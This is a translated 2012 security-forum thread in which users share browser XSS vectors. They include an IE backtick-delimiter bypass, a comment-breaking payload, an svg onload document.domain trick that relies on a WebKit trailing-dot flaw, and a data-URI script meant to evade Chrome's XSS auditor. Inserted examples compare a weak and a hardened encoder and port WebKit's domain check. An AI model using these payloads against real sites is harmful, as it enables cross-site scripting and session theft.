Sharing a few XSS vectors I've been playing with recently

Category: WooYun-Zone

<img src=`<body/onload=alert(1) />

When IE recognises a tag it requires the tag's closing delimiter; because src only has an (opening) attribute delimiter, `<img` is not treated as a tag, so `<body/onload=alert(1) />` gets parsed.

<!-- `<img/src=xx:xx onerror=alert(1)//--!>

IE: an attribute delimiter inside a comment tag can break the `>` terminator and invalidate the preceding comment tag. (I'm not entirely sure of the exact reason myself.)

<svg/onload=domain=id>

22 characters in total; works in WebKit-based browsers.

Here `domain=id` is equivalent to `document.domain=""`.

Normally this cannot succeed.

Combined with a WebKit bug, adding a dot after the host makes it work, although upstream does not consider this a bug.

Example: http://fiddle.jshell.net./KG7fR/5/show (crossing from jsfiddle to jsbin)
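
The first vector works because IE honours the backtick as an attribute delimiter, so an output encoder that leaves backticks alone does not neutralise it. As an added example (not code from the post), the usual five-character entity encoder is compared with one that hex-encodes every non-alphanumeric character in attribute context; the payload string is the one from the post, the function names are mine.

```javascript
// Added example (not from the thread): two attribute-value encoders run
// against the backtick vector. Function names are assumptions of this example.

// The common five-character encoder; it never touches the backtick.
const FIVE_CHAR = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function encodeFiveChar(value) {
  return String(value).replace(/[&<>"']/g, (c) => FIVE_CHAR[c]);
}

// Attribute-context encoder: every character outside [A-Za-z0-9] becomes a
// numeric entity, so no quote, backtick, space, '=' or '/' survives encoding.
// The 'u' flag keeps astral characters as one code point instead of two halves.
function encodeAttr(value) {
  return String(value).replace(/[^A-Za-z0-9]/gu, (c) => {
    return "&#x" + c.codePointAt(0).toString(16).toUpperCase() + ";";
  });
}

// Render the value into the slot the vector targets: an unquoted src= attribute.
function renderImg(encoder, value) {
  return `<img src=${encoder(value)}>`;
}

// Payload taken from the post: a backtick followed by a second tag.
const PAYLOAD = "`<body/onload=alert(1) />";

// True if the encoded text still contains a character that can act as an
// attribute delimiter or tag boundary in some browser (backtick included).
function hasAttrDelimiter(encoded) {
  return /[`"' =<>\/]/.test(encoded);
}

// Compare both encoders on the payload; returns the two rendered tags and
// whether each still carries a raw delimiter.
function compareEncoders(payload) {
  const weak = renderImg(encodeFiveChar, payload);
  const hardened = renderImg(encodeAttr, payload);
  return {
    weak,
    weakStillDangerous: hasAttrDelimiter(encodeFiveChar(payload)),
    hardened,
    hardenedStillDangerous: hasAttrDelimiter(encodeAttr(payload)),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  const r = compareEncoders(PAYLOAD);
  console.log("five-char :", r.weak, "| raw delimiter left:", r.weakStillDangerous);
  console.log("attr-hex  :", r.hardened, "| raw delimiter left:", r.hardenedStillDangerous);
}
```

The five-character encoder leaves the backtick and the space in place, which is all the IE parser needs; the hex encoder produces a value with nothing but alphanumerics and `&#x..;` entities, so the surrounding `src=` cannot be broken out of regardless of which delimiter a browser accepts.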

  1. 1#

    xsser | 2012-05-26 22:18

Props for this kind of sharing!!!!

  2. 2#

    蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2012-05-26 22:57

Good stuff.. now I want to know how to XSS Chrome

  3. 3#

    Sogili (.) 长短短 (.) | 2012-05-26 23:05

@蟋蟀哥哥 Do you mean bypassing Chrome's XSS auditor?

  4. 4#

    Xhm1n9 | 2012-05-26 23:12

Learned something :)

  5. 5#

    蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2012-05-26 23:46

@Sogili Yes. Google's anti-XSS is pretty strong; at the moment pure XSS can't get around it, you can only bypass it with the help of third-party stuff like Flash

  6. 6#

    Sogili (.) 长短短 (.) | 2012-05-26 23:56

@蟋蟀哥哥 give this a try: <svg><script/xlink:href=data:,alert(1)></script>

  7. 7#

    冷冷的夜 (1) | 2012-05-27 12:21

@Sogili Thanks for sharing

  8. 8#

    p.z | 2012-05-27 12:31

Thanks for sharing!

  9. 9#

    gainover | 2012-05-27 13:07

    <img src=`<body/onload=alert(1) />

The backtick one was fixed in IE9. The whole `<img src=`<body/onload=alert(1) />` is just displayed as text.

  10. 10#

    CnCxzSec(衰仔) | 2012-05-27 13:54

Thanks @Sogili for sharing!

  11. 11#

    rayh4c | 2012-05-27 21:27

@Sogili http://code.google.com/p/chromium/issues/detail?id=103384 = = this cross-origin one really is bizarre~

  12. 12#

    Sogili (.) 长短短 (.) | 2012-05-27 22:54

    @rayh4c

    void Document::setDomain(const String& newDomain, ExceptionCode& ec)
    {
        if (SecurityOrigin::isDomainRelaxationForbiddenForURLScheme(securityOrigin()->protocol())) {
            ec = SECURITY_ERR;
            return;
        }

        // Both NS and IE specify that changing the domain is only allowed when
        // the new domain is a suffix of the old domain.

        // FIXME: We should add logging indicating why a domain was not allowed.

        // If the new domain is the same as the old domain, still call
        // securityOrigin()->setDomainForDOM. This will change the
        // security check behavior. For example, if a page loaded on port 8000
        // assigns its current domain using document.domain, the page will
        // allow other pages loaded on different ports in the same domain that
        // have also assigned to access this page.
        if (equalIgnoringCase(domain(), newDomain)) {
            securityOrigin()->setDomainFromDOM(newDomain);
            if (m_frame)
                m_frame->script()->updateSecurityOrigin();
            return;
        }

        int oldLength = domain().length();
        int newLength = newDomain.length();
        // e.g. newDomain = webkit.org (10) and domain() = www.webkit.org (14)
        if (newLength >= oldLength) {
            ec = SECURITY_ERR;
            return;
        }

        String test = domain();
        // Check that it's a subdomain, not e.g. "ebkit.org"
        if (test[oldLength - newLength - 1] != '.') {
            ec = SECURITY_ERR;
            return;
        }

        // Now test is "webkit.org" from domain()
        // and we check that it's the same thing as newDomain
        test.remove(0, oldLength - newLength);
        if (test != newDomain) {
            ec = SECURITY_ERR;
            return;
        }

        securityOrigin()->setDomainFromDOM(newDomain);
        if (m_frame)
            m_frame->script()->updateSecurityOrigin();
    }

Adam Barth found this problem back in 2008 and reported it to WebKit, asking that updateSecurityOrigin be called to re-check the origin (https://bugs.webkit.org/show_bug.cgi?id=22776).
But ScriptController's updateSecurityOrigin is an empty implementation.
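
As an added example (not part of the thread and not WebKit's code), here is the suffix check from the Document::setDomain() listing above ported to JavaScript so it can be stepped through in Node, together with a hardened variant of my own. In `<svg/onload=domain=id>` the handler's scope chain includes the document and the element, so `domain` resolves to `document.domain` and `id` to the element's empty id attribute: the assignment is `document.domain = ""`. The hosts in the cases are the thread's own; the function names and the hardened rules are assumptions of this example.

```javascript
// Added example, not code from the thread or from WebKit: a JavaScript port of
// the suffix check in the Document::setDomain() listing above. The scheme check
// and updateSecurityOrigin() (a no-op, per the thread) are left out.

// Mirrors the C++: returns the accepted domain or throws "SECURITY_ERR".
function setDomainWebKit(currentDomain, newDomain) {
  // Assigning the same domain (case-insensitively) is always accepted.
  if (currentDomain.toLowerCase() === newDomain.toLowerCase()) {
    return newDomain;
  }
  const oldLength = currentDomain.length;
  const newLength = newDomain.length;
  // e.g. newDomain = webkit.org (10) and domain() = www.webkit.org (14)
  if (newLength >= oldLength) {
    throw new Error("SECURITY_ERR");
  }
  // Check that it's a subdomain, not e.g. "ebkit.org": the character right
  // before the suffix must be a dot. With newDomain = "" this inspects the
  // LAST character of the host, which is exactly where a trailing dot sits.
  if (currentDomain[oldLength - newLength - 1] !== ".") {
    throw new Error("SECURITY_ERR");
  }
  // Now compare the suffix itself; for newDomain = "" the suffix is "".
  if (currentDomain.slice(oldLength - newLength) !== newDomain) {
    throw new Error("SECURITY_ERR");
  }
  return newDomain;
}

// Hardened variant (my own rules, not what WebKit shipped): refuse an empty
// target, refuse hosts written with a trailing dot, and refuse relaxing to a
// bare label; the last rule is a crude stand-in for a public-suffix check.
function setDomainHardened(currentDomain, newDomain) {
  if (newDomain === "" || currentDomain.endsWith(".") || !newDomain.includes(".")) {
    throw new Error("SECURITY_ERR");
  }
  return setDomainWebKit(currentDomain, newDomain);
}

// Wrapper so outcomes can be compared without try/catch at each call site.
function tryDomain(fn, currentDomain, newDomain) {
  try {
    return { ok: true, domain: fn(currentDomain, newDomain) };
  } catch (e) {
    return { ok: false, error: e.message };
  }
}

// Cases from the thread (hosts are the thread's examples; outcomes are what
// the ported check computes).
const CASES = [
  ["www.webkit.org", "webkit.org"],   // legitimate relaxation: allowed
  ["www.webkit.org", "ebkit.org"],    // not on a label boundary: rejected
  ["fiddle.jshell.net", ""],          // domain=id on a normal host: rejected
  ["fiddle.jshell.net.", ""],         // trailing dot: slips through the old check
];

function demo() {
  return CASES.map(([host, target]) => ({
    host,
    target,
    webkit: tryDomain(setDomainWebKit, host, target),
    hardened: tryDomain(setDomainHardened, host, target),
  }));
}

if (typeof require !== "undefined" && require.main === module) {
  for (const r of demo()) {
    console.log(`${r.host} -> "${r.target}": webkit=${r.webkit.ok ? "allowed" : "SECURITY_ERR"}, hardened=${r.hardened.ok ? "allowed" : "SECURITY_ERR"}`);
  }
}
```

Run it with `node` to see the fourth row: with the host `fiddle.jshell.net.` the index `oldLength - newLength - 1` lands on the trailing dot, the suffix comparison is `"" === ""`, and the old check accepts an empty domain, which is the state the trailing-dot demo in the first post relies on.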

  13. 13#

凤凰 (phoenix nirvana, reborn from the flames) | 2012-05-29 17:28

Impressive! Learned something

  14. 14#

    HuGtion | 2012-05-31 11:02

Thanks for sharing!

  15. 15#

xsser_w (what the hell are you looking at, moron!) | 2012-06-13 18:00

    = =! niubility